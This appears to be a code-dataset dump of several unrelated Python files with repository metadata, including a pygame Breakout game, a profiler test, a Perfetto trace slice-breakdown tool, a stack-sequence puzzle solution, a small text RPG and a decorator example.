                newBrick.addBonus(Triball(newBrick))
        elif brickChar == 'P':
            newBrick = Brick(join("resources","images","brick-purple.png"), self.drawLocation)
            luckyNum = randint(0,4)
            if luckyNum == 3:
                newBrick.addBonus(Triball(newBrick))
        elif brickChar == 'G':
            newBrick = Brick(join("resources","images","brick-green.png"), self.drawLocation)
            luckyNum = randint(0,7)
            if luckyNum == 3:
                newBrick.addBonus(Slowball(newBrick))
        elif brickChar == 'O':
            newBrick = Brick(join("resources","images","brick-orange.png"), self.drawLocation)
            luckyNum = randint(0,5)
            if luckyNum == 5:
                newBrick.addBonus(Triball(newBrick))
        elif brickChar == 'B':
            newBrick = Brick(join("resources","images","brick-blue.png"), self.drawLocation)
            luckyNum = randint(0,5)
            if luckyNum == 0:
                newBrick.addBonus(Triball(newBrick))
        elif brickChar == 'Q':
            newBrick = Brick(join("resources","images","brick-grey.png"), self.drawLocation, 0, False)
        elif brickChar == '.':
            newBrick = Brick(join("resources","images","brick-grey.png"), self.drawLocation, 0, True, True)
        if newBrick.isDestructible and not(newBrick.isDestroyed):
            self.numDestructibleBricks +=1
        self.drawLocation = self.drawLocation[0]+40,self.drawLocation[1]
        return newBrick
    def updateScreen(self):
        "Draw everything on the screen"
        self.screen.fill(RGB_BLACK)
        #Draw Paddle and Ball
        self.screen.blit(self.paddle.image, self.paddle.rect)
        for ball in self.balls:
            self.screen.blit(ball.image, ball.rect)
        #Draw Points Label and Points String
        self.screen.blit(self.pointsLabel, (10,10))
        self.screen.blit(self.pointsString, (80,10))
        #Draw Level Label and Level String
        self.screen.blit(self.levelLabel, (200, 10))
        self.screen.blit(self.levelString, (250, 10))
        #Draw non-destroyed Bricks for current level
        self.drawBricks()
        #Draw any bonuses that are on screen at the moment
        for boni in self.bonuses:
            self.screen.blit(boni.image, boni.rect)
        #Draw Mini-paddles signifying lifes left
        self.drawMiniPaddles()
        pygame.display.flip()
    def drawMiniPaddles(self):
        """Draw one mini-paddle per remaining life along the bottom-left edge."""
        if(self.numLives == 0):
            return
        drawPos = 0
        miniPaddleImage = pygame.image.load(join("resources","images","paddle-mini.png"))
        miniPaddleRect = miniPaddleImage.get_rect()
        for numLife in range(self.numLives):
            self.screen.blit(miniPaddleImage,(0+drawPos,GB_HEIGHT-miniPaddleRect.height))
            drawPos = drawPos + 22
    def reset(self):
        "Reset Ball, Paddle, and Speed to default positions and states. Called after a ball falls into the abyss."
        self.balls = []
        self.balls.append(Ball(join("resources","images","ball-mini.png")))
        self.paddle = Paddle(join("resources","images","paddle.png"),self.balls[0])
        self.pointsColor = RGB_WHITE
        self.running = True
        self.speed = self.level
    def startGame(self):
        "Start a new game, reset everything to default positions and states"
        # level must be set before reset(), which reads it for the speed.
        self.level = 0
        self.reset()
        self.points = 0
        #self.level = "TEST1"
        self.numDestructibleBricks = 0
        #Load bricks
        self.bricks = self.loadBricks()
        self.numLives = 2
        # One-shot extra-life flags awarded at 500 and 1500 points.
        self.oneUpBonuses = [False,False]
        self.font = pygame.font.Font(join("resources","fonts","Verdana.TTF"),12)
        self.pointsLabel = self.font.render("Points: ", True, RGB_WHITE)
        self.pointsString = self.font.render(str(self.points), True, self.pointsColor)
        self.levelLabel = self.font.render("Level: ", True, RGB_WHITE)
        self.levelString = self.font.render(str(self.level), True, RGB_WHITE)
        self.gameOver = False
    def play(self):
        "The main game loop occurs here, checks for keyboard input, updates game state, etc..."
        self.running = True
        lastLevelUpTime = time.time()
        #Excellent suggestions from Peter Nosgoth to have tighter control over Mouse
        pygame.mouse.set_visible(False)
        pygame.event.set_grab(True)
        while 1:
            for event in pygame.event.get():
                if event.type == pygame.QUIT: exit()
            keys = pygame.key.get_pressed()
            mouse_x = pygame.mouse.get_pos()[0]
            button1,button2,button3 = pygame.mouse.get_pressed()
            #print "mouse_x = %s"%mouse_x
            # Step the paddle one pixel at a time until it catches up with
            # the mouse x position (stops at the right board edge).
            mousePosEqual = True
            while mousePosEqual:
                mousePosEqual = mouse_x != self.paddle.rect.left
                if mouse_x < self.paddle.rect.left:
                    self.paddle.moveLeft(1)
                elif mouse_x > self.paddle.rect.left:
                    if self.paddle.rect.right < self.width:
                        self.paddle.moveRight(1)
                    else:
                        mousePosEqual = False
            # Space / left button launches; Return / other buttons spend a
            # life to respawn; 'y' restarts after game over; Esc quits.
            if keys[K_SPACE] or button1:
                if self.balls[0].stuck:
                    self.balls[0].stuck = False
            elif keys[K_RETURN] or button2 or button3:
                if (len(self.balls) <= 0) or (len(self.balls) == 1 and not self.balls[0].stuck):
                    if self.numLives >=1:
                        self.numLives -=1
                        self.reset()
                        #print "self.numLives = %s"%self.numLives
                    else:
                        self.running = False
                        self.endgame()
            elif keys[K_y]:
                if self.gameOver:
                    #print "K_y pressed launch brand new game"
                    self.startGame()
            elif keys[K_ESCAPE]:
                #print "K_ESCAPE pressed launch brand new game"
                exit()
            if self.running:
                self.checkBonusCollision()
                for ball in self.balls:
                    self.checkBallCollision(ball)
                    hitWall = ball.autoMove()
                    if hitWall:
                        self.soundManager.play('cartoon-spring-sound',[0.2,0.2])
                    #print self.ball
                    if(ball.rect.top >= GB_HEIGHT):
                        self.balls.remove(ball)
                for boni in self.bonuses:
                    boni.moveDown(1)
                    if boni.rect.y > GB_HEIGHT:
                        #if it reaches the bottom of the screen remove it from the bonuses list
                        self.bonuses.remove(boni)
                self.pointsString = self.font.render(str(self.points), True, self.pointsColor)
                self.updateScreen()
                #All balls have left the gameboard, need to pause and wait for Right Click
                # or if numLives == 0, then end game.
                if len(self.balls) == 0:
                    self.running = False
                    self.pointsColor = RGB_RED
                    if self.numLives == 0:
                        self.endgame()
                if self.checkLevelUp():
                    self.speed = self.level
                    # Wrap back to level 0 after the last level.
                    if self.level == LAST_LEVEL:
                        self.level = -1
                    self.level += 1
                    self.levelString = self.font.render(str(self.level), True, RGB_WHITE)
                    self.bricks = self.loadBricks()
                    self.balls = []
                    self.balls.append(Ball(join("resources","images","ball-mini.png")))
                    self.paddle = Paddle(join("resources","images","paddle.png"),self.balls[0])
            #Wait a couple of milliseconds
            currentTime = time.time()
            if(currentTime - lastLevelUpTime > 15):
                lastLevelUpTime = currentTime
                if (STARTSPEED - self.speed > 0):
                    #print "15 s elapsed increasing speed by 1"
                    self.speed +=1
                #else:
                    #print "reached max speed"
            pygame.time.wait(STARTSPEED - self.speed)
    def checkBallCollision(self, currentBall):
        """Handle currentBall's collisions with the paddle and with bricks.

        The paddle is split into five 8-pixel zones that steer the rebound;
        brick hits probe one pixel beyond each side of the ball to decide
        which direction component to flip, then score/destroy the brick.
        """
        if(currentBall.rect.colliderect(self.paddle.rect)):
            #Check if it is a vertical collision or horizontal collision
            firstFifth = self.paddle.rect.left + 8
            secondFifth = self.paddle.rect.left + 16
            thirdFifth = self.paddle.rect.left + 24
            fourthFifth = self.paddle.rect.left + 32
            if currentBall.rect.left < firstFifth:
                #Any incoming ball should be redirected up and left
                #print "Hit firstFifth of paddle"
                currentBall.x_dir = -1
                currentBall.y_dir = -1
            elif currentBall.rect.left >= firstFifth and currentBall.rect.left < secondFifth:
                #Any incoming ball that hits this area should be redirect in opposite y and opposite x
                #print "Hit secondFifth of paddle"
                currentBall.x_dir = -1
                currentBall.y_dir = -1 * currentBall.y_dir
            elif currentBall.rect.left >= secondFifth and currentBall.rect.left < thirdFifth:
                #Any incoming ball that hits this area should be redirect in opposite y and opposite x
                #print "Hit thirdFifth of paddle"
                currentBall.x_dir = 0
                currentBall.y_dir = -1 * currentBall.y_dir
            elif currentBall.rect.left >= thirdFifth and currentBall.rect.left < fourthFifth:
                #Any incoming ball that hits this area should be redirect in opposite y and opposite x
                #print "Hit fourthFifth of paddle"
                currentBall.x_dir = 1
                currentBall.y_dir = -1 * currentBall.y_dir
            else:
                #print "Hit fifthFifth of paddle"
                currentBall.x_dir = 1
                currentBall.y_dir = -1
            #paddle and ball collided, play appropriate sound
            self.soundManager.play('cartoon-blurp-sound',[0.3,0.3])
        #check for collision with any non-destroyed bricks
        for brick in self.bricks:
            if(brick.isDestroyed):
                pass
            elif(currentBall.rect.colliderect(brick.rect)):
                if not brick.isDestructible:
                    #indestructible brick and ball collided, play appropriate sound
                    brick.hitCount += 1
                    self.soundManager.play('cartoon-blurp-sound',[0.3,0.3])
                testpointright = currentBall.rect.left+currentBall.rect.width+1,currentBall.rect.top
                testpointleft = currentBall.rect.left-1,currentBall.rect.top
                testpointtop = currentBall.rect.left,currentBall.rect.top-1
                testpointbottom = currentBall.rect.left,currentBall.rect.top+currentBall.rect.height+1
                if(brick.rect.collidepoint(testpointright)):
                    #test if the right side of the ball collided with the brick
                    currentBall.x_dir = -1
                elif(brick.rect.collidepoint(testpointleft)):
                    #test if the left side of the ball collided with the brick
                    currentBall.x_dir = 1
                if(brick.rect.collidepoint(testpointtop)):
                    #test if top of ball collided with brick
                    currentBall.y_dir = 1
                elif(brick.rect.collidepoint(testpointbottom)):
                    #test if the bottom of the ball collided with the brick
                    currentBall.y_dir = -1
                self.points += brick.pointValue
                # Grey bricks give way on their 4th hit; coloured ones immediately.
                if(brick.isDestructible or brick.hitCount == 4):
                    brick.isDestroyed = True
                    if(brick.isDestructible):
                        self.numDestructibleBricks -=1
                    self.soundManager.play('punchhard',[0.3,0.3])
                    if brick.hasBonus:
                        self.bonuses.append(brick.bonus)
                    #only give out bonuses when a destructible brick is hit
                    if (self.points == 500 and not self.oneUpBonuses[0]):
                        self.numLives +=1
                        self.soundManager.play('triangle',[0.3,0.3])
                        self.oneUpBonuses[0] = True
                    elif (self.points == 1500 and not self.oneUpBonuses[1]):
                        self.numLives +=1
                        self.soundManager.play('triangle',[0.3,0.3])
                        self.oneUpBonuses[1] = True
                #print "numDestructibleBricks = %s"%self.numDestructibleBricks
                break
    def checkBonusCollision(self):
        """Apply and remove any falling bonus that the paddle has caught.

        NOTE(review): removes items from the list being iterated; if two
        bonuses were caught in the same frame one could be skipped until
        the next frame.
        """
        for boni in self.bonuses:
            if boni.rect.colliderect(self.paddle.rect):
                self.bonuses.remove(boni)
                boni.applyBonus(self)
    def checkLevelUp(self):
        """Return True once every destructible brick in the level is gone."""
        if self.numDestructibleBricks == 0:
            return True
        return False
    def endgame(self):
        """Render the game-over overlay once and flag the game as finished."""
        #print "endgame called!"
        if self.gameOver:
            return
        self.gameOverLabel = self.font.render("GAME OVER", True, RGB_WHITE)
        self.playAgainLabel = self.font.render("Play Again?", True, RGB_WHITE)
        self.instructionsLabel = self.font.render("YES (y) / NO (ESC)", True, RGB_WHITE)
        self.screen.blit(self.gameOverLabel,(100, 40))
        self.pointsColor = RGB_RED
        self.screen.blit(self.playAgainLabel,(100, 75))
        self.screen.blit(self.instructionsLabel,(80, 95))
        self.gameOver = True
        pygame.display.flip()
if __name__ == '__main__':
    # Initialise pygame and its font subsystem before any game objects are built.
    pygame.init()
    pygame.font.init()
    pygame.display.set_caption("PyBreakout")
    game = PyBreakout()
    game.initializeScreen()
    game.play()
| [
"nathan.dawson@723f4f67-661f-0410-8c27-63261dba3161"
] | nathan.dawson@723f4f67-661f-0410-8c27-63261dba3161 |
f7dd5ae13580c2a8137446a42f87b5b1b7ac7d71 | ea508c55e951f23ec2f4f5ff35b193d9f30a989a | /pyext/test2.py | a6ac16ef18987029e3ae36759a9eb62863bf2cb7 | [
"Apache-2.0"
] | permissive | intel-ai/pysamprof | f746551e30237fae9b8869e5e05156a3cb2aba13 | 643de4dd8260c9cd2f75ad5accf9b2e4cbd96c4d | refs/heads/master | 2023-01-25T02:21:01.665315 | 2020-11-27T08:18:22 | 2020-11-27T08:18:22 | 159,366,126 | 2 | 1 | Apache-2.0 | 2020-12-03T15:32:18 | 2018-11-27T16:30:40 | C | UTF-8 | Python | false | false | 787 | py | #!/usr/bin/env python
import pysamprof
import threading
import os
import errno
import sys
import subprocess
def foo():
    """Start pysamprof tracing into the first unused results/<n> directory.

    Scans results/0, results/1, ... under the current working directory and
    starts the profiler on the first path that does not exist yet. The path
    is now built with os.path.join instead of a hand-formatted '%s/%s'
    string, so the separator is correct on every platform.
    """
    counter = 0
    while True:
        target_path = os.path.join(os.getcwd(), 'results', str(counter))
        if os.path.exists(target_path):
            counter += 1
        else:
            break
    pysamprof.start(target_path)
def bar():
    """Thin wrapper that delegates to foo() (adds one frame to the call stack)."""
    foo()
def task(duration=1):
    """Busy-wait (spin) for roughly `duration` seconds.

    Generalised from the original hard-coded one-second spin; the default
    preserves the old behaviour. Spinning (rather than sleeping) keeps the
    CPU busy — presumably so the sampling profiler has work to observe.
    The unused `import socket` from the original has been removed.
    """
    import time
    stop = time.time() + duration
    while time.time() <= stop:
        pass
if __name__ == '__main__':
    # proc = subprocess.Popen([sys.executable,
    # os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'subtest.py')])
    # Start the profiler (via bar -> foo), burn CPU, then fork and burn CPU
    # in BOTH processes.  NOTE(review): os.fork() is POSIX-only, and both
    # parent and child execute the trailing task() call.
    bar()
    task()
    os.fork()
    task()
    # th = threading.Thread(target=task)
    # th.start()
    # th.join()
    # proc.wait()
| [
"vasilij.n.litvinov@intel.com"
] | vasilij.n.litvinov@intel.com |
36adf07500d5bc3797a8452a938b03936503f491 | e291353d76e7209ccee7eef14f32f4157f2daaf6 | /build/learning_tf/catkin_generated/pkg.installspace.context.pc.py | d848f2666aa4b56f426941c843f6d2fbf742b03c | [] | no_license | EmanuelAlogna/Robotics-Ass01 | 23bc7d2079212340b6c8a30fd0e84e8ca1de49cb | bfc6421e69d9719da945da8bf728416fb4fb636b | refs/heads/master | 2022-01-05T15:32:26.050866 | 2019-06-02T17:39:59 | 2019-06-02T17:39:59 | 187,210,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# Auto-generated by catkin at configure time -- do not edit by hand.
# Empty strings mean the package exports nothing for that field.
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []  # no exported include dirs
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')  # no catkin dependencies declared
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []  # no exported libraries
PROJECT_NAME = "learning_tf"
PROJECT_SPACE_DIR = "/home/emanuel/catkin_ws/install"
PROJECT_VERSION = "0.0.0"
| [
"emanuel.alogna@gmail.com"
] | emanuel.alogna@gmail.com |
1852e9dffcb63b063f786faeffaec2ee72e25153 | 390d19c3159133d8c688396cb11b4ed3f8178d09 | /BaekJoon/단계별로 풀어보기/Stack & Queue/1874_스택 수열.py | a3b4cc9eb6adb72cb147d6257fb3a6768140f325 | [] | no_license | JJayeee/CodingPractice | adba64cbd1d030b13a877f0b2e5ccc1269cb2e11 | 60f8dce48c04850b9b265a9a31f49eb6d9fc13c8 | refs/heads/master | 2021-08-16T17:14:01.161390 | 2021-07-16T00:42:18 | 2021-07-16T00:42:18 | 226,757,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | n = int(input())
# BOJ 1874: decide whether the target sequence can be produced with a
# single stack; print the push ('+') / pop ('-') trace, or NO.
arr = [int(input()) for _ in range(n)]
target_idx = 0
work = []
ops = []
for value in range(1, n + 1):
    # Push the next natural number, then pop while the stack top matches
    # the next required output value.
    work.append(value)
    ops.append('+')
    while work and work[-1] == arr[target_idx]:
        work.pop()
        ops.append('-')
        target_idx += 1
if work:
    print('NO')
else:
    for symbol in ops:
        print(symbol)
| [
"jay.hyundong@gmail.com"
] | jay.hyundong@gmail.com |
f113c125c3ce5cd72b7620e569795cbd92cdd0b5 | 44999f0e918047807c6505df2833c500a1fba22d | /util.py | 8bf9d2d0cf6cce58dc1849ddc5bdfb2c5146ca75 | [
"MIT"
] | permissive | PsiRadish/HeroesFeast | 3f3fcd2b0284cba3d58686688c283f52fb647df5 | 0c700e3e1e495671c70595bdb8927758f1fc6754 | refs/heads/master | 2021-07-18T16:10:46.375296 | 2017-12-23T01:13:59 | 2017-12-23T01:13:59 | 114,166,133 | 0 | 0 | MIT | 2021-06-10T19:51:32 | 2017-12-13T20:33:46 | Python | UTF-8 | Python | false | false | 316 | py |
class staticproperty:  # https://stackoverflow.com/a/39499304
    """Works like @property and @staticmethod combined.

    The decorated zero-argument function runs on first attribute access;
    its result then replaces this descriptor on the owner class, so every
    later access is a plain (cached) attribute lookup.
    """
    def __init__(self, func):
        self.func = func
    def __get__(self, inst, owner):
        value = self.func()
        # Overwrite the descriptor itself with the computed value so
        # subsequent lookups bypass __get__ entirely.
        setattr(owner, self.func.__name__, value)
        return value
| [
"KyleFiegener@gmail.com"
] | KyleFiegener@gmail.com |
435e29a274be72c7a13ebd6d95c17895552450da | 18c5519edd77fb222ec5c9ea338b651bd99aa147 | /objects/battle.py | b0d08f8a47d9f9a6011454552c8767751b52f701 | [
"BSD-3-Clause"
] | permissive | hdert/2018.py | 1b0a84d6ebc1bd6a4d56a95963851216931ea6a3 | 66fc5afc853af2ed5d6b2fc5f280e73be200a542 | refs/heads/master | 2020-05-09T16:42:55.913274 | 2020-01-25T06:56:31 | 2020-01-25T06:56:31 | 181,280,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,829 | py | '''
Author: hdert
Date: 13/6/2018
Version: V 0.1.3.6.6 Dev
'''
#--Classes--
class Character:
    """A playable adventurer: race/gender display strings plus combat stats."""

    # Race display strings
    HUMAN = 'A Human'
    ORC = 'An Orc'
    ELF = 'An Elf'
    BEAVER = 'A Beaver'
    # Gender display strings
    MALE = 'Male'
    FEMALE = 'Female'

    def __init__(self, pName, pRace, pGender, pSkill, pStrength, pHealth,
                 pWeapon):
        """Create a character; every new character starts out 'Alive'."""
        self.name = pName
        self.race = pRace
        self.gender = pGender
        self.skill = pSkill
        self.strength = pStrength
        self.health = pHealth
        self.weapon = pWeapon
        self.alive = 'Alive'

    def __repr__(self):
        """Multi-line character sheet used by the profile printout."""
        stats = (self.name, self.race, self.gender, self.weapon,
                 self.strength, self.skill, self.health, self.alive)
        return '''
        {0} Is {1} And Is {2}
        Weapon: {3}
        Strength: {4}
        Intelligence: {5}
        Health: {6}
        Status: {7}
        '''.format(*stats)

    # Simple accessors, kept for API compatibility with existing callers.
    def getName(self):
        return self.name

    def getRace(self):
        return self.race

    def getSkill(self):
        return self.skill

    def getStrength(self):
        return self.strength

    def getHealth(self):
        return self.health

    def getWeapon(self):
        return self.weapon

    def getGender(self):
        return self.gender

    def getAlive(self):
        return self.alive

    def setWeapon(self, weapon):
        """Replace the currently equipped weapon."""
        self.weapon = weapon
class Weapon:
    """A weapon: a display name, a weapon-type string and a power rating."""

    # Weapon-type display strings
    FLAMETHROWER = 'A Flamethrower'
    SHOTGUN = 'A Shotgun'
    RIFLE = 'A Rifle'

    def __init__(self, pname, ptype, ppower):
        self.name = pname
        self.type = ptype
        self.power = ppower

    def __repr__(self):
        """One-line summary, e.g. "BigFlame, A Flamethrower With 30 Power"."""
        return '{}, {} With {} Power'.format(self.name, self.type, self.power)

    # Simple accessors, kept for API compatibility with existing callers.
    def getName(self):
        return self.name

    def getType(self):
        return self.type

    def getPower(self):
        return self.power
#--Variables--
pick = False  # input-validation flag reused by every menu loop below
# Weapon roster.  The l/m/s name prefixes appear to denote
# large/medium/small (starter) tiers -- TODO confirm; only the s* weapons
# are offered at character creation below.
lFlame = Weapon('BigFlame', Weapon.FLAMETHROWER, 30)
lShot = Weapon('ManyBullet', Weapon.SHOTGUN, 20)
lRifle = Weapon('NearlySniper', Weapon.RIFLE, 40)
mFlame = Weapon('NormFlame', Weapon.FLAMETHROWER, 20)
mShot = Weapon('NotSoManyBullet', Weapon.SHOTGUN, 15)
mRifle = Weapon('ArmyRifle', Weapon.RIFLE, 25)
sFlame = Weapon('ShortFlame', Weapon.FLAMETHROWER, 10)
sShot = Weapon('CoupleBullet', Weapon.SHOTGUN, 10)
sRifle = Weapon('ChineseGun', Weapon.RIFLE, 15)
#--Main-Code--
# Character creation flow: each while-loop re-prompts until valid input.
# Loop 1: pick a non-empty first name.
while pick == False:
    firstName = input('Pick A First Name For Your Adventurer: ')
    if firstName == '' or firstName == ' ':
        print('''
Whoops "{}" Isn't A Valid Name
Let's Try That Again
Tip!: Try Making Your Name Something Other Than
"" Or " "
    '''.format(firstName))
        a = input("Press Enter To Continue ")
        print('\n')
    else:
        pick = True
pick = False
# Loop 2: pick a race; each race fixes the skill/strength/health stats.
while pick == False:
    race = input('''
A Human (1)
An Orc (2)
An Elf (3)
Or A Beaver (4)
Pick A Race: ''')
    if race == '1':
        race = Character.HUMAN
        skill = 65
        strength = 55
        health = 105
        pick = True
    elif race == '2':
        race = Character.ORC
        skill = 35
        strength = 75
        health = 125
        pick = True
    elif race == '3':
        race = Character.ELF
        skill = 85
        strength = 35
        health = 85
        pick = True
    elif race == '4':
        race = Character.BEAVER
        skill = 45
        strength = 65
        health = 75
        pick = True
    else:
        print('''
Whoops What Went Wrong There
Let's Try That Again
Tip!: Try Using The Number Beside The Race Choice's
To Pick Your Character's Race
    ''')
        a = input("Press Enter To Continue ")
pick = False
# Loop 3: pick a gender; the full name becomes "<first> <first>son/daughter".
while pick == False:
    gender = input('''
Male (1)
Or Female (2)
Pick A Gender: ''')
    if gender == '1':
        gender = Character.MALE
        name = firstName + ' ' + firstName + 'son'
        pick = True
    elif gender == '2':
        gender = Character.FEMALE
        name = firstName + ' ' + firstName + 'daughter'
        pick = True
    else:
        print('''
Whoops What Went Wrong There
Let's Try That Again
Tip!: Try Using The Number Beside The Gender Choice's
To Pick Your Character's Gender
    ''')
        a = input("Press Enter To Continue ")
pick = False
# Loop 4: pick a starter weapon (small tier only) and build the Character.
while pick == False:
    weapon = input('''
{} (1)
{} (2)
{} (3)
Pick A Starter Weapon: '''.format(sFlame, sShot, sRifle))
    if weapon == '1':
        weapon = sFlame
        user = Character(name, race, gender, skill, strength,
                         health, weapon)
        pick = True
    elif weapon == '2':
        weapon = sShot
        user = Character(name, race, gender, skill, strength,
                         health, weapon)
        pick = True
    elif weapon == '3':
        weapon = sRifle
        user = Character(name, race, gender, skill, strength,
                         health, weapon)
        pick = True
    else:
        print('''
Whoops What Went Wrong There
Let's Try That Again
Tip!: Try Using The Number Beside The Weapon Choice's
To Pick Your Character's Starting Weapon
    ''')
        a = input("Press Enter To Continue ")
pick = False
# Loop 5: optionally print the finished character sheet (Character.__repr__).
while pick == False:
    charPrint = input('''
Would You Like To See Your Newly
Created Character's Profile? (Y/N): ''')
    if charPrint == 'Y' or charPrint == 'y':
        pick = True
        print(user)
    elif charPrint == 'N' or charPrint == 'n':
        pick = True
    else:
        print('''
Whoops What Went Wrong There
Let's Try That Again
Tip!: Try Using The Y or N To Pick Whether You
Want To See Your Character's Profile
    ''')
        a = input("Press Enter To Continue ")
| [
"40216616+Hdertgaming@users.noreply.github.com"
] | 40216616+Hdertgaming@users.noreply.github.com |
d1aa97ee9525de12321fffed6d30be61c50374f8 | add0702c25993c2c37eaf4b4e0c03f45808cbe45 | /tools/slice_breakdown/perfetto/slice_breakdown/breakdown.py | 85b21d2544ce4accdeae49df83c8c81b7cfeaeff | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | sszllx/perfetto | aa43900682628050e5768bfbe53078b37715eefb | e5fc9f62634b179a6ced07fd2f565a9cee70f5bd | refs/heads/master | 2023-08-19T18:11:18.671489 | 2021-10-29T03:44:33 | 2021-10-29T03:44:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,337 | py | #!/usr/bin/env python3
# Copyright (C) 2021 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def compute_breakdown(tp, start_ts=None, end_ts=None, process_name=None):
"""For each userspace slice in the trace processor instance |tp|, computes
the self-time of that slice grouping by process name, thread name
and thread state.
Args:
tp: the trace processor instance to query.
start_ts: optional bound to only consider slices after this ts
end_ts: optional bound to only consider slices until this ts
process_name: optional process name to filter for slices; specifying
this argument can make computing the breakdown a lot faster.
Returns:
A Pandas dataframe containing the total self time taken by a slice stack
broken down by process name, thread name and thread state.
"""
bounds = tp.query('SELECT * FROM trace_bounds').as_pandas_dataframe()
start_ts = start_ts if start_ts else bounds['start_ts'][0]
end_ts = end_ts if end_ts else bounds['end_ts'][0]
tp.query("""
DROP VIEW IF EXISTS modded_names
""")
tp.query("""
CREATE VIEW modded_names AS
SELECT
slice.id,
slice.depth,
slice.stack_id,
CASE
WHEN slice.name LIKE 'Choreographer#doFrame%'
THEN 'Choreographer#doFrame'
WHEN slice.name LIKE 'DrawFrames%'
THEN 'DrawFrames'
WHEN slice.name LIKE '/data/app%.apk'
THEN 'APK load'
WHEN slice.name LIKE 'OpenDexFilesFromOat%'
THEN 'OpenDexFilesFromOat'
WHEN slice.name LIKE 'Open oat file%'
THEN 'Open oat file'
ELSE slice.name
END AS modded_name
FROM slice
""")
tp.query("""
DROP VIEW IF EXISTS thread_slice_stack
""")
tp.query("""
CREATE VIEW thread_slice_stack AS
SELECT
efs.ts,
efs.dur,
IFNULL(n.stack_id, -1) AS stack_id,
t.utid,
IIF(efs.source_id IS NULL, '[No slice]', IFNULL(
(
SELECT GROUP_CONCAT(modded_name, ' > ')
FROM (
SELECT p.modded_name
FROM ancestor_slice(efs.source_id) a
JOIN modded_names p ON a.id = p.id
ORDER BY p.depth
)
) || ' > ' || n.modded_name,
n.modded_name
)) AS stack_name
FROM experimental_flat_slice({}, {}) efs
LEFT JOIN modded_names n ON efs.source_id = n.id
JOIN thread_track t ON t.id = efs.track_id
""".format(start_ts, end_ts))
tp.query("""
DROP TABLE IF EXISTS thread_slice_stack_with_state
""")
tp.query("""
CREATE VIRTUAL TABLE thread_slice_stack_with_state
USING SPAN_JOIN(
thread_slice_stack PARTITIONED utid,
thread_state PARTITIONED utid
)
""")
if process_name:
where_process = "AND process.name = '{}'".format(process_name)
else:
where_process = ''
breakdown = tp.query("""
SELECT
process.name AS process_name,
thread.name AS thread_name,
CASE
WHEN slice.state = 'D' and slice.io_wait
THEN 'Uninterruptible sleep (IO)'
WHEN slice.state = 'DK' and slice.io_wait
THEN 'Uninterruptible sleep + Wake-kill (IO)'
WHEN slice.state = 'D' and not slice.io_wait
THEN 'Uninterruptible sleep (non-IO)'
WHEN slice.state = 'DK' and not slice.io_wait
THEN 'Uninterruptible sleep + Wake-kill (non-IO)'
WHEN slice.state = 'D'
THEN 'Uninterruptible sleep'
WHEN slice.state = 'DK'
THEN 'Uninterruptible sleep + Wake-kill'
WHEN slice.state = 'S' THEN 'Interruptible sleep'
WHEN slice.state = 'R' THEN 'Runnable'
WHEN slice.state = 'R+' THEN 'Runnable (Preempted)'
ELSE slice.state
END AS state,
slice.stack_name,
SUM(slice.dur)/1e6 AS dur_sum,
MIN(slice.dur/1e6) AS dur_min,
MAX(slice.dur/1e6) AS dur_max,
AVG(slice.dur/1e6) AS dur_mean,
PERCENTILE(slice.dur/1e6, 50) AS dur_median,
PERCENTILE(slice.dur/1e6, 25) AS dur_25_percentile,
PERCENTILE(slice.dur/1e6, 75) AS dur_75_percentile,
PERCENTILE(slice.dur/1e6, 95) AS dur_95_percentile,
PERCENTILE(slice.dur/1e6, 99) AS dur_99_percentile,
COUNT(1) as count
FROM process
JOIN thread USING (upid)
JOIN thread_slice_stack_with_state slice USING (utid)
WHERE dur != -1 {}
GROUP BY thread.name, stack_id, state
ORDER BY dur_sum DESC
""".format(where_process)).as_pandas_dataframe()
return breakdown
def compute_breakdown_for_startup(tp, package_name=None, process_name=None):
"""Computes the slice breakdown (like |compute_breakdown|) but only
considering slices which happened during an app startup
Args:
tp: the trace processor instance to query.
package_name: optional package name to filter for startups. Only a single
startup matching this package name should be present. If not specified,
only a single startup of any app should be in the trace.
process_name: optional process name to filter for slices; specifying
this argument can make computing the breakdown a lot faster.
Returns:
The same as |compute_breakdown| but only containing slices which happened
during app startup.
"""
tp.metric(['android_startup'])
# Verify there was only one startup in the trace matching the package
# name.
filter = "WHERE package = '{}'".format(package_name) if package_name else ''
launches = tp.query('''
SELECT ts, ts_end, dur
FROM launches
{}
'''.format(filter)).as_pandas_dataframe()
if len(launches) == 0:
raise Exception("Didn't find startup in trace")
if len(launches) > 1:
raise Exception("Found multiple startups in trace")
start = launches['ts'][0]
end = launches['ts_end'][0]
return compute_breakdown(tp, start, end, process_name)
| [
"lalitm@google.com"
] | lalitm@google.com |
d111f7578b298ea148bce5bba4e6cc7466523c4e | 2cfd01446942d8113dbf8ec62b23f36a75333459 | /Decorator_examples/Passing_aruguments_to_decorators.py | 1edbc7fb2137aeed793e45daec8e702b9c08dd32 | [] | no_license | umesh-gattem-rzt/Python_Decorators | 9cb1e7b73d739d50ce648f48a8a2b03285700463 | 85e9dcb70cc1fb24a347bf5f38a41099071dc5bb | refs/heads/master | 2021-01-11T23:50:07.764872 | 2017-05-17T08:15:17 | 2017-05-17T08:15:17 | 78,634,262 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | from functools import wraps
def tags(tag_name):
def tags_decorator(func):
@wraps(func)
def func_wrapper(name):
return "<{0}>{1}</{0}>".format(tag_name, func(name))
return func_wrapper
return tags_decorator
@tags("div")
@tags("p")
@tags("strong")
def get_name(name):
"""Returns the Name of person"""
return "Hello " + name
print(get_name("Umesh Kumar"))
print(get_name.__name__)
print(get_name.__doc__)
print(get_name.__module__)
| [
